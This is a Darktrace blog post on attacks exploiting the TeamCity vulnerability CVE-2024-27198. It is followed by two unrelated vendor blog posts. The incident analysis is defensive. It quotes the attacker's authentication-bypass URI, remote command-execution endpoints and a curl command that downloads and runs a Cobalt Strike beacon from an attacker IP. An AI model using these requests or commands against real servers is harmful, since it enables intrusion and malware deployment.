Blog
/

Inside the SOC

/
August 21, 2024

Race Against Time: Detecting JetBrains’ TeamCity Exploitation Activity with Darktrace

Default blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
21
Aug 2024
Darktrace observed the rapid exploitation of a critical vulnerability in JetBrains TeamCity (CVE-2024-27198) shortly following its public disclosure. Learn how the need for speedy detection serves to protect against supply chain attacks.

The rise in vulnerability exploitation

In recent years, threat actors have increasingly been observed exploiting endpoints and services associated with critical vulnerabilities almost immediately after those vulnerabilities are publicly disclosed. The time-to-exploit for internet-facing servers is accelerating as the risk of vulnerabilities in web components continuously grows. This growth demands faster detection and response from organizations and their security teams to ward off the rising number of exploitation attempts. One such case is that of CVE-2024-27198, a critical vulnerability in TeamCity On-Premises, a popular continuous integration and continuous delivery/deployment (CI/CD) solution for DevOps teams developed by JetBrains.

The disclosure of TeamCity vulnerabilities

On March 4, 2024, JetBrains published an advisory regarding two authentication bypass vulnerabilities, CVE-2024-27198 and CVE-2024-27199, affecting TeamCity On-Premises version 2023.11.3. and all earlier versions [1].

The most severe of the two vulnerabilities, CVE-2024-27198, would enable an attacker to take full control over all TeamCity projects and use their position as a suitable vector for a significant attack across the organization’s supply chain. The other vulnerability, CVE-2024-27199, was disclosed to be a path traversal bug that allows attackers to perform limited administrative actions. On the same day, several proof-of-exploits for CVE-2024-27198 were created and shared for public use; in effect, enabling anyone with the means and intent to validate whether a TeamCity device is affected by this vulnerability [2][3].

Using CVE-2024-27198, an attacker is able to successfully call an authenticated endpoint with no authentication, if they meet three requirements during an HTTP(S) request:

  • Request an unauthenticated resource that generates a 404 response.

/hax

  • Pass an HTTP query parameter named jsp containing the value of an authenticated URI path.

?jsp=/app/rest/server

  • Ensure the arbitrary URI path ends with .jsp by appending an HTTP path parameter segment.

;.jsp

  • Once combined, the URI path used by the attacker becomes:

/hax?jsp=/app/rest/server;.jsp

Over 30,000 organizations use TeamCity to automate and build testing and deployment processes for software projects. As various On-Premises servers are internet-facing, it became a short matter of time until exposed devices were faced with the inevitable rush of exploitation attempts. On March 7, the Cybersecurity and Infrastructure Security Agency (CISA) confirmed this by adding CVE-2024-27198 to its Known Exploited Catalog and noted that it was being actively used in ransomware campaigns. A shortened time-to-exploit has become fairly common for software known to be deeply embedded into an organization’s supply chain. Darktrace detected exploitation attempts of this vulnerability in the two days following JetBrains’ disclosure [4] [5].

Shortly after the disclosure of CVE-2024-27198, Darktrace observed malicious actors attempting to validate proof-of-exploits on a number of customer environments in the financial sector. After attackers validated the presence of the vulnerability on customer networks, Darktrace observed a series of suspicious activities including malicious file downloads, command-and-control (C2) connectivity and, in some cases, the delivery of cryptocurrency miners to TeamCity devices.

Fortunately, Darktrace was able to identify this malicious post-exploitation activity on compromised servers at the earliest possible stage, notifying affected customers and advising them to take urgent mitigative actions.

Attack details

Exploit Validation Activity

On March 6, just two days after the public disclosure of CVE-2024-27198, Darktrace first observed a customer being affected by the exploitation of the vulnerability when a TeamCity device received suspicious HTTP connections from the external endpoint, 83.97.20[.]141. This endpoint was later confirmed to be malicious and linked with the exploitation of TeamCity vulnerabilities by open-source intelligence (OSINT) sources [6]. The new user agent observed during these connections suggest they were performed using Python.

Figure 1: Advanced Search results shows the user agent (python-requests/2.25) performing initial stages of exploit validation for CVE-2024-27198.

The initial HTTP requests contained the following URIs:

/hax?jsp=/app/rest/server;[.]jsp

/hax?jsp=/app/rest/users;[.]jsp

These URIs match the exact criteria needed to exploit CVE-2024-27198 and initiate malicious unauthenicated requests. Darktrace / NETWORK recognized that these HTTP connections were suspicious, thus triggering the following models to alert:

  • Device / New User Agent
  • Anomalous Connection / New User Agent to IP Without Hostname

Establish C2

Around an hour later, Darktrace observed subsequent requests suggesting that the attacker began reconnaissance of the vulnerable device with the following URIs:

/app/rest/debug/processes?exePath=/bin/sh&params=-c&params=echo+ReadyGO

/app/rest/debug/processes?exePath=cmd.exe&params=/c&params=echo+ReadyGO

These URIs set an executable path to /bin/sh or cmd.exe; instructing the shell of either a Unix-like or Windows operating system to execute the command echo ReadyGO. This will display “ReadyGO” to the attacker and validate which operating system is being used by this TeamCity server.

The same  vulnerable device was then seen downloading an executable file, “beacon.out”, from the aforementioned external endpoint via HTTP on port 81, using a new user agent curl/8.4.0.

Figure 2: Darktrace’s Cyber AI Analyst detecting suspicious download of an executable file.
Figure 3: Advanced Search overview of the URIs used in the HTTP requests.

Subsequently, the attacker was seen using the curl command on the vulnerable TeamCity device to perform the following call:

“/app/rest/debug/processes?exePath=cmd[.]exe&params=/c&params=curl+hxxp://83.97.20[.]141:81/beacon.out+-o+.conf+&&+chmod++x+.conf+&&+./.conf”.

in attempt to pass the following command to the device’s command line interpreter:

“curl http://83.97.20[.]141:81/beacon.out -o .conf && chmod +x .conf && ./.conf”

From here, the attacker attempted to fetch the contents of the “beacon.out” file and create a new executable file from its output. This was done by using the -o parameter to output the results of the “beacon.out” file into a “.conf” file. Then using chmod+x to modify the file access permissions and make this file an executable aswell, before running the newly created “.conf” file.

Further investigation into the “beacon.out” file uncovered that is uses the Cobalt Strike framework. Cobalt Strike would allow for the creation of beacon components that can be configured to use HTTP to reach a C2 host [7] [8].

Cryptocurrency Mining Activities

Interestingly, prior to the confirmed exploitation of CVE-2024-27198, Darktrace observed the same vulnerable device being targeted in an attempt to deploy cryptocurrency mining malware, using a variant of the open-source mining software, XMRig. Deploying crypto-miners on vulnerable internet-facing appliances is a common tactic by financially motivated attackers, as was seen with Ivanti appliances in January 2024 [9].

Figure 4: Darktrace’s Cyber AI Analyst detects suspicious C2 activity over HTTP.

On March 5, Darktrace observed the TeamCity device connecting to another to rare, external endpoint, 146.70.149[.]185, this time using a “Windows Installer” user agent: “146.70.149[.]185:81/JavaAccessBridge-64.msi”. Similar threat activity highlighted by security researchers in January 2024, pointed to the use of a XMRig installer masquerading as an official Java utlity: “JavaAccessBridge-64.msi”. [10]

Further investigation into the external endpoint and URL address structuring, uncovered additional URIs: one serving crypto-mining malware over port 58090 and the other a C2 panel hosted on the same endpoint: “146.70.149[.]185:58090/1.sh”.

Figure 5:Crypto mining malware served over port 58090 of the rare external endpoint.

146.70.149[.]185/uadmin/adm.php

Figure 6: C2 panel on same external endpoint.

Upon closer observation, the panel resembles that of the Phishing-as-a-Service (PhaaS) provided by the “V3Bphishing kit” – a sophisticated phishing kit used to target financial institutions and their customers [11].

Darktrace Coverage

Throughout the course of this incident, Darktrace’s Cyber AI Analyst™ was able to autonomously investigate the ongoing post-exploitation activity and connect the individual events, viewing the individual suspicious connections and downloads as part of a wider compromise incident, rather than isolated events.

Figure 7: Darktrace’s Cyber AI Analyst investigates suspicious download activity.

As this particular customer was subscribed to Darktrace’s Managed Threat Detection service at the time of the attack, their internal security team was immediately notified of the ongoing compromise, and the activity was raised to Darktrace’s Security Operations Center (SOC) for triage and investigation.

Unfortunately, Darktrace’s Autonomous Response capabilities were not configured to take action on the vulnerable TeamCity device, and the attack was able to escalate until Darktrace’s SOC brought it to the customer’s attention. Had Darktrace been enabled in Autonomous Response mode, it would have been able to quickly contain the attack from the initial beaconing connections through the network inhibitor ‘Block matching connections’. Some examples of autonomous response models that likely would have been triggered include:

  • Antigena Crypto Currency Mining Block - Network Inhibitor (Block matching connections)
  • Antigena Suspicious File Block - Network Inhibitor (Block matching connections)

Despite the lack of autonomous response, Darktrace’s Self-Learning AI was still able to detect and alert for the anomalous network activity being carried out by malicious actors who had successfully exploited CVE-2024-27198 in TeamCity On-Premises.

Conclusion

In the observed cases of the JetBrains TeamCity vulnerabilities being exploited across the Darktrace fleet, Darktrace was able to pre-emptively identify and, in some cases, contain network compromises from the onset, offering vital protection against a potentially disruptive supply chain attack.

While the exploitation activity observed by Darktrace confirms the pervasive use of public exploit code, an important takeaway is the time needed for threat actors to employ such exploits in their arsenal. It suggests that threat actors are speeding up augmentation to their tactics, techniques and procedures (TTPs), especially from the moment a critical vulnerability is publicly disclosed. In fact, external security researchers have shown that CVE-2024-27198 had seen exploitation attempts within 22 minutes of a public exploit code being released  [12][13] [14].

While new vulnerabilities will inevitably surface and threat actors will continually look for novel or AI-augmented ways to evolve their methods, Darktrace’s AI-driven detection capabilities and behavioral analysis offers organizations full visibility over novel or unknown threats. Rather than relying on only existing threat intelligence, Darktrace is able to detect emerging activity based on anomaly and respond to it without latency, safeguarding customer environments whilst causing minimal disruption to business operations.

Credit to Justin Frank (Cyber Analyst & Newsroom Product Manager) and Daniela Alvarado (Senior Cyber Analyst)

Appendices

References

[1] https://blog.jetbrains.com/teamcity/2024/03/additional-critical-security-issues-affecting-teamcity-on-premises-cve-2024-27198-and-cve-2024-27199-update-to-2023-11-4-now/

[2] https://github.com/Chocapikk/CVE-2024-27198

[3] https://www.rapid7.com/blog/post/2024/03/04/etr-cve-2024-27198-and-cve-2024-27199-jetbrains-teamcity-multiple-authentication-bypass-vulnerabilities-fixed/

[4] https://www.darkreading.com/cyberattacks-data-breaches/jetbrains-teamcity-mass-exploitation-underway-rogue-accounts-thrive

[5] https://www.gartner.com/en/documents/5524495
[6]https://www.virustotal.com/gui/ip-address/83.97.20.141

[7] https://thehackernews.com/2024/03/teamcity-flaw-leads-to-surge-in.html

[8] https://www.cobaltstrike.com/product/features/beacon

[9] https://darktrace.com/blog/the-unknown-unknowns-post-exploitation-activities-of-ivanti-cs-ps-appliances

[10] https://www.trendmicro.com/en_us/research/24/c/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware.html

[11] https://www.resecurity.com/blog/article/cybercriminals-attack-banking-customers-in-eu-with-v3b-phishing-kit

[12] https://www.ncsc.gov.uk/report/impact-of-ai-on-cyber-threat

[13] https://www2.deloitte.com/content/dam/Deloitte/us/Documents/risk/us-design-ai-threat-report-v2.pdf

[14] https://blog.cloudflare.com/application-security-report-2024-update

[15] https://www.virustotal.com/gui/file/1320e6dd39d9fdb901ae64713594b1153ee6244daa84c2336cf75a2a0b726b3c

Darktrace Model Detections

Device / New User Agent

Anomalous Connection / New User Agent to IP Without Hostname

Anomalous Connection / Callback on Web Facing Device

Anomalous Connection / Application Protocol on Uncommon Port

Anomalous File / EXE from Rare External Location

Anomalous File / Internet Facing System File Download

Anomalous Server Activity / New User Agent from Internet Facing System

Device / Initial Breach Chain Compromise

Device / Internet Facing Device with High Priority Alert

Indicators of Compromise (IoC)

IoC -     Type – Description

/hax?jsp=/app/rest/server;[.]jsp - URI

/app/rest/debug/processes?exePath=/bin/sh&params=-c&params=echo+ReadyGO - URI

/app/rest/debug/processes?exePath=cmd.exe&params=/c&params=echo+ReadyGO – URI -

db6bd96b152314db3c430df41b83fcf2e5712281 - SHA1 – Malicious file

/beacon.out - URI  -

/JavaAccessBridge-64.msi - MSI Installer

/app/rest/debug/processes?exePath=cmd[.]exe&params=/c&params=curl+hxxp://83.97.20[.]141:81/beacon.out+-o+.conf+&&+chmod++x+.conf+&&+./.con - URI

146.70.149[.]185:81 - IP – Malicious Endpoint

83.97.20[.]141:81 - IP – Malicious Endpoint

MITRE ATT&CK Mapping

Initial Access - Exploit Public-Facing Application - T1190

Execution - PowerShell - T1059.001

Command and Control - Ingress Tool Transfer - T1105

Resource Development - Obtain Capabilities - T1588

Execution - Vulnerabilities - T1588.006

Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Author
Justin Frank
Product Manager and Cyber Analyst
Book a 1-1 meeting with one of our experts
Share this article

More in this series

No items found.

Blog

/

January 29, 2025

/

Inside the SOC

Bytesize Security: Insider Threats in Google Workspace

Default blog imageDefault blog image

What is an insider threat?

An insider threat is a cyber risk originating from within an organization. These threats can involve actions such as an employee inadvertently clicking on a malicious link (e.g., a phishing email) or an employee with malicious intent conducting data exfiltration for corporate sabotage.

Insiders often exploit their knowledge and access to legitimate corporate tools, presenting a continuous risk to organizations. Defenders must protect their digital estate against threats from both within and outside the organization.

For example, in the summer of 2024, Darktrace / IDENTITY successfully detected a user in a customer environment attempting to steal sensitive data from a trusted Google Workspace service. Despite the use of a legitimate and compliant corporate tool, Darktrace identified anomalies in the user’s behavior that indicated malicious intent.

Attack overview: Insider threat

In June 2024, Darktrace detected unusual activity involving the Software-as-a-Service (SaaS) account of a former employee from a customer organization. This individual, who had recently left the company, was observed downloading a significant amount of data in the form of a “.INDD” file (an Adobe InDesign document typically used to create page layouts [1]) from Google Drive.

While the use of Google Drive and other Google Workspace platforms was not unexpected for this employee, Darktrace identified that the user had logged in from an unfamiliar and suspicious IPv6 address before initiating the download. This anomaly triggered a model alert in Darktrace / IDENTITY, flagging the activity as potentially malicious.

A Model Alert in Darktrace / IDENTITY showing the unusual “.INDD” file being downloaded from Google Workspace.
Figure 1: A Model Alert in Darktrace / IDENTITY showing the unusual “.INDD” file being downloaded from Google Workspace.

Following this detection, the customer reached out to Darktrace’s Security Operations Center (SOC) team via the Security Operations Support service for assistance in triaging and investigating the incident further. Darktrace’s SOC team conducted an in-depth investigation, enabling the customer to identify the exact moment of the file download, as well as the contents of the stolen documents. The customer later confirmed that the downloaded files contained sensitive corporate data, including customer details and payment information, likely intended for reuse or sharing with a new employer.

In this particular instance, Darktrace’s Autonomous Response capability was not active, allowing the malicious insider to successfully exfiltrate the files. If Autonomous Response had been enabled, Darktrace would have immediately acted upon detecting the login from an unusual (in this case 100% rare) location by logging out and disabling the SaaS user. This would have provided the customer with the necessary time to review the activity and verify whether the user was authorized to access their SaaS environments.

Conclusion

Insider threats pose a significant challenge for traditional security tools as they involve internal users who are expected to access SaaS platforms. These insiders have preexisting knowledge of the environment, sensitive data, and how to make their activities appear normal, as seen in this case with the use of Google Workspace. This familiarity allows them to avoid having to use more easily detectable intrusion methods like phishing campaigns.

Darktrace’s anomaly detection capabilities, which focus on identifying unusual activity rather than relying on specific rules and signatures, enable it to effectively detect deviations from a user’s expected behavior. For instance, an unusual login from a new location, as in this example, can be flagged even if the subsequent malicious activity appears innocuous due to the use of a trusted application like Google Drive.

Credit to Vivek Rajan (Cyber Analyst) and Ryan Traill (Analyst Content Lead)

Appendices

Darktrace Model Detections

SaaS / Resource::Unusual Download Of Externally Shared Google Workspace File

References

[1]https://www.adobe.com/creativecloud/file-types/image/vector/indd-file.html

MITRE ATT&CK Mapping

Technqiue – Tactic – ID

Data from Cloud Storage Object – COLLECTION -T1530

Continue reading
About the author
Vivek Rajan
Cyber Analyst

Blog

/

January 28, 2025

/
No items found.

Reimagining Your SOC: How to Achieve Proactive Network Security

Default blog imageDefault blog image

Introduction: Challenges and solutions to SOC efficiency

For Security Operation Centers (SOCs), reliance on signature or rule-based tools – solutions that are always chasing the latest update to prevent only what is already known – creates an excess of false positives. SOC analysts are therefore overwhelmed by a high volume of context-lacking alerts, with human analysts able to address only about 10% due to time and resource constraints. This forces many teams to accept the risks of addressing only a fraction of the alerts while novel threats go completely missed.

74% of practitioners are already grappling with the impact of an AI-powered threat landscape, which amplifies challenges like tool sprawl, alert fatigue, and burnout. Thus, achieving a resilient network, where SOC teams can spend most of their time getting proactive and stopping threats before they occur, feels like an unrealistic goal as attacks are growing more frequent.

Despite advancements in security technology (advanced detection systems with AI, XDR tools, SIEM aggregators, etc...), practitioners are still facing the same issues of inefficiency in their SOC, stopping them from becoming proactive. How can they select security solutions that help them achieve a proactive state without dedicating more human hours and resources to managing and triaging alerts, tuning rules, investigating false positives, and creating reports?

To overcome these obstacles, organizations must leverage security technology that is able to augment and support their teams. This can happen in the following ways:

  1. Full visibility across the modern network expanding into hybrid environments
  2. Have tools that identifies and stops novel threats autonomously, without causing downtime
  3. Apply AI-led analysis to reduce time spent on manual triage and investigation

Your current solutions might be holding you back

Traditional cybersecurity point solutions are reliant on using global threat intelligence to pattern match, determine signatures, and consequently are chasing the latest update to prevent only what is known. This means that unknown threats will evade detection until a patient zero is identified. This legacy approach to threat detection means that at least one organization needs to be ‘patient zero’, or the first victim of a novel attack before it is formally identified.

Even the point solutions that claim to use AI to enhance threat detection rely on a combination of supervised machine learning, deep learning, and transformers to

train and inform their systems. This entails shipping your company’s data out to a large data lake housed somewhere in the cloud where it gets blended with attack data from thousands of other organizations. The resulting homogenized dataset gets used to train AI systems — yours and everyone else’s — to recognize patterns of attack based on previously encountered threats.

While using AI in this way reduces the workload of security teams who would traditionally input this data by hand, it emanates the same risk – namely, that AI systems trained on known threats cannot deal with the threats of tomorrow. Ultimately, it is the unknown threats that bring down an organization.

The promise and pitfalls of XDR in today's threat landscape

Enter Extended Detection and Response (XDR): a platform approach aimed at unifying threat detection across the digital environment. XDR was developed to address the limitations of traditional, fragmented tools by stitching together data across domains, providing SOC teams with a more cohesive, enterprise-wide view of threats. This unified approach allows for improved detection of suspicious activities that might otherwise be missed in siloed systems.

However, XDR solutions still face key challenges: they often depend heavily on human validation, which can aggravate the already alarmingly high alert fatigue security analysts experience, and they remain largely reactive, focusing on detecting and responding to threats rather than helping prevent them. Additionally, XDR frequently lacks full domain coverage, relying on EDR as a foundation and are insufficient in providing native NDR capabilities and visibility, leaving critical gaps that attackers can exploit. This is reflected in the current security market, with 57% of organizations reporting that they plan to integrate network security products into their current XDR toolset[1].

Why settling is risky and how to unlock SOC efficiency

The result of these shortcomings within the security solutions market is an acceptance of inevitable risk. From false positives driving the barrage of alerts, to the siloed tooling that requires manual integration, and the lack of multi-domain visibility requiring human intervention for business context, security teams have accepted that not all alerts can be triaged or investigated.

While prioritization and processes have improved, the SOC is operating under a model that is overrun with alerts that lack context, meaning that not all of them can be investigated because there is simply too much for humans to parse through. Thus, teams accept the risk of leaving many alerts uninvestigated, rather than finding a solution to eliminate that risk altogether.

Darktrace / NETWORK is designed for your Security Operations Center to eliminate alert triage with AI-led investigations , and rapidly detect and respond to known and unknown threats. This includes the ability to scale into other environments in your infrastructure including cloud, OT, and more.

Beyond global threat intelligence: Self-Learning AI enables novel threat detection & response

Darktrace does not rely on known malware signatures, external threat intelligence, historical attack data, nor does it rely on threat trained machine learning to identify threats.

Darktrace’s unique Self-learning AI deeply understands your business environment by analyzing trillions of real-time events that understands your normal ‘pattern of life’, unique to your business. By connecting isolated incidents across your business, including third party alerts and telemetry, Darktrace / NETWORK uses anomaly chains to identify deviations from normal activity.

The benefit to this is that when we are not predefining what we are looking for, we can spot new threats, allowing end users to identify both known threats and subtle, never-before-seen indicators of malicious activity that traditional solutions may miss if they are only looking at historical attack data.

AI-led investigations empower your SOC to prioritize what matters

Anomaly detection is often criticized for yielding high false positives, as it flags deviations from expected patterns that may not necessarily indicate a real threat or issues. However, Darktrace applies an investigation engine to automate alert triage and address alert fatigue.

Darktrace’s Cyber AI Analyst revolutionizes security operations by conducting continuous, full investigations across Darktrace and third-party alerts, transforming the alert triage process. Instead of addressing only a fraction of the thousands of daily alerts, Cyber AI Analyst automatically investigates every relevant alert, freeing up your team to focus on high-priority incidents and close security gaps.

Powered by advanced machine-learning techniques, including unsupervised learning, models trained by expert analysts, and tailored security language models, Cyber AI Analyst emulates human investigation skills, testing hypotheses, analyzing data, and drawing conclusions. According to Darktrace Internal Research, Cyber AI Analyst typically provides a SOC with up to  50,000 additional hours of Level 2 analysis and written reporting annually, enriching security operations by producing high level incident alerts with full details so that human analysts can focus on Level 3 tasks.

Containing threats with Autonomous Response

Simply quarantining a device is rarely the best course of action - organizations need to be able to maintain normal operations in the face of threats and choose the right course of action. Different organizations also require tailored response functions because they have different standards and protocols across a variety of unique devices. Ultimately, a ‘one size fits all’ approach to automated response actions puts organizations at risk of disrupting business operations.

Darktrace’s Autonomous Response tailors its actions to contain abnormal behavior across users and digital assets by understanding what is normal and stopping only what is not. Unlike blanket quarantines, it delivers a bespoke approach, blocking malicious activities that deviate from regular patterns while ensuring legitimate business operations remain uninterrupted.

Darktrace offers fully customizable response actions, seamlessly integrating with your workflows through hundreds of native integrations and an open API. It eliminates the need for costly development, natively disarming threats in seconds while extending capabilities with third-party tools like firewalls, EDR, SOAR, and ITSM solutions.

Unlocking a proactive state of security

Securing the network isn’t just about responding to incidents — it’s about being proactive, adaptive, and prepared for the unexpected. The NIST Cybersecurity Framework (CSF 2.0) emphasizes this by highlighting the need for focused risk management, continuous incident response (IR) refinement, and seamless integration of these processes with your detection and response capabilities.

Despite advancements in security technology, achieving a proactive posture is still a challenge to overcome because SOC teams face inefficiencies from reliance on pattern-matching tools, which generate excessive false positives and leave many alerts unaddressed, while novel threats go undetected. If SOC teams are spending all their time investigating alerts then there is no time spent getting ahead of attacks.

Achieving proactive network resilience — a state where organizations can confidently address challenges at every stage of their security posture — requires strategically aligned solutions that work seamlessly together across the attack lifecycle.

References

1.       Market Guide for Extended Detection and Response, Gartner, 17thAugust 2023 - ID G00761828

Continue reading
About the author
Your data. Our AI.
Elevate your network security with Darktrace AI